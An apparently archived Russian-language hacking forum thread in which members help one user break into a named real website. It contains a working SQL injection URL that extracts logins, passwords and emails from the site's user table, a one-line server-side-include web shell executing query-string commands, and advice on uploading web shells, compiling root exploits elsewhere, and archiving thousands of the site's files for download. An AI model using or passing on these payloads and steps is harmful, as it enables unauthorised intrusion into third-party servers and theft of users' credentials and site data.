Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204

    Вот скажи: ты любишь, когда все за тебя делают? Прочитай подпись электа =\ "Кто, если не ты сам?" (c) Elekt.
    Вот тебе так лень самому протестить на локалхосте? о_0
     
  2. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    Я бы посмотрел как ты проведешь такую конструкцию в union(так даже blind не составишь):).
     
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    PaCo
    Не торопись с выводами. blind так составишь запросто, и я это описывал тут:
    https://forum.antichat.ru/thread104591.html
    Вопрос №6

    И union можно, если немного подумать и потестить на локалке , попробуй :)
     
  4. laedafess

    laedafess Member

    Joined:
    11 Feb 2009
    Messages:
    70
    Likes Received:
    29
    Reputations:
    15
    надо что-то типо:
    http://site.ru/index.php?id=1+procedure+analyse()
    Только работает оно не везде.. или у мну руки кривые=\
    Вот почитай : клик
     
  5. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    http://site.ru/index.php?id=1+procedure+analyse()
    Ага всё я узнал префикс...и нашёл тоблицу g_users
    Но также там значения видимо с префиксом...
    Можно ли как-то узнать эти значения? (пытался брутить то стандартному словорю SIPT4)
     
  6. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    Возможно это поможет:
    http://cr0w-at.blogspot.com/2009/03/mysql-4x.html
     
  7. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Не помогает...

    PHP:
    http://transsib-express.ru/index.php?id=344&nid=-198+union+select+1,2,3,4,5,6,7,8--+
    таблички
    cms_config
    cms_group
    cms_news
    cms_users (поля gid uid)

    Помогите вот на счёт этого весь день и парюсь...
     
    #6727 Byrger, 23 Apr 2009
    Last edited: 23 Apr 2009
  8. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Собственно в чём проблема не пойму? Вывод получить чтоли? Или я чего то не понимаю?
     
  9. serfertty

    serfertty Guest

    Reputations:
    0
    Подобрать колонку, в которой хрянтся пассы=\.
     
  10. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Ух... все стандартные префиксы+колонки пробрутил...300мб ушло...
    Может есть другие способы?
     
  11. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    [​IMG]


    http://transsib-express.ru/index.php?id=344&nid=-198+union+select+1,2,3,4,concat_ws(0x2F,_login,_pass,_mail),6,7,8+from+cms_users--+


    А копирайты поставить ?
     
    #6731 ElteRUS, 23 Apr 2009
    Last edited: 23 Apr 2009
  12. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    :D
    Лови ++

    А тогда такой вопрос...
    Есть шелл
    Но на сервере не нашёл компилятора gcc в каталогах /sbin/ и /bin/ как быть?
    Выполняя команду gcc Exploit.c -o Exploit ничего не происходит...

    И как можно слить все файлы каталога с сайтом сразу?
    Safe-mode: ON
    Архивировать по средствам c99 не удаётся...
    может возможно какойнить дампер на PHP залить туда? Если не сложно то какой
     
    #6732 Byrger, 23 Apr 2009
    Last edited: 23 Apr 2009
  13. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Byrger
    если ты выполняешь
    gcc Exploit.c -o Exploit из веб-шелла и у тебя ничего не происходит, то ответ ты написал ниже
    Safe-mode: ON
    Тебе нужен полноценный шелл, ну или хотя бы веб-шелл с нормальными правами
    Пробуй залить перловый шелл, например r57pws.pl
    Ищи в гугле
     
  14. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    если подключен mod_include, попробуй использовать SSI, создай файл с расширением shtml, например shell.shtml с таким содержанием:
    Code:
    <!--#exec cmd="$QUERY_STRING_UNESCAPED"-->
    , и пользуй его, например
    Code:
    http://transsib-express.ru/path/shell.shtml?ls -lp
     
    2 people like this.
  15. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Нет это вовершенно 2 разных гелла!
    Пытаюсь слить кантент с Safe-mode: ON
    И зарутить с Safe-mode: OFF
     
  16. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    2 Byrger
    скомпиль на какой-нибудь другой тачке сплоит, да и загрузи его
     
  17. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    2Byrger
    попробуй:
    http://site.ru/path/shell.shtml?ltar -cvzf ./dump.tgz /path/to/dir/kotoruyu/slivat
    а первое как сказал Iceangel_
     
  18. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Не получается заархивировать...может потому что файлы которые архивирую с правами на чтение?
    Права сменить не могу = ( они стают (1234)
     
  19. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    права на чтение - это как раз то что надо. а вообще, посмотри по ls -lia
    и если в каждой тройке будет r - значит можешь спокойно архивить.

    может быть у тебя нехватает прав на ту диру,куда ты указал положить архив?
     
  20. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Ничего не выдаёт может из-за Safe-mode: ON
    Сохраняю в дирку с правами 777
    любой фаил пытаюсь c99 архивировать пишет...
    Can't call archivator (tar cfzv archive_9f27c.tar.gz -v0x2z.jpg)!

    Конешно можно по 1 файлу выкачивать но это не дело...там их более 5к
     
Thread Status:
Not open for further replies.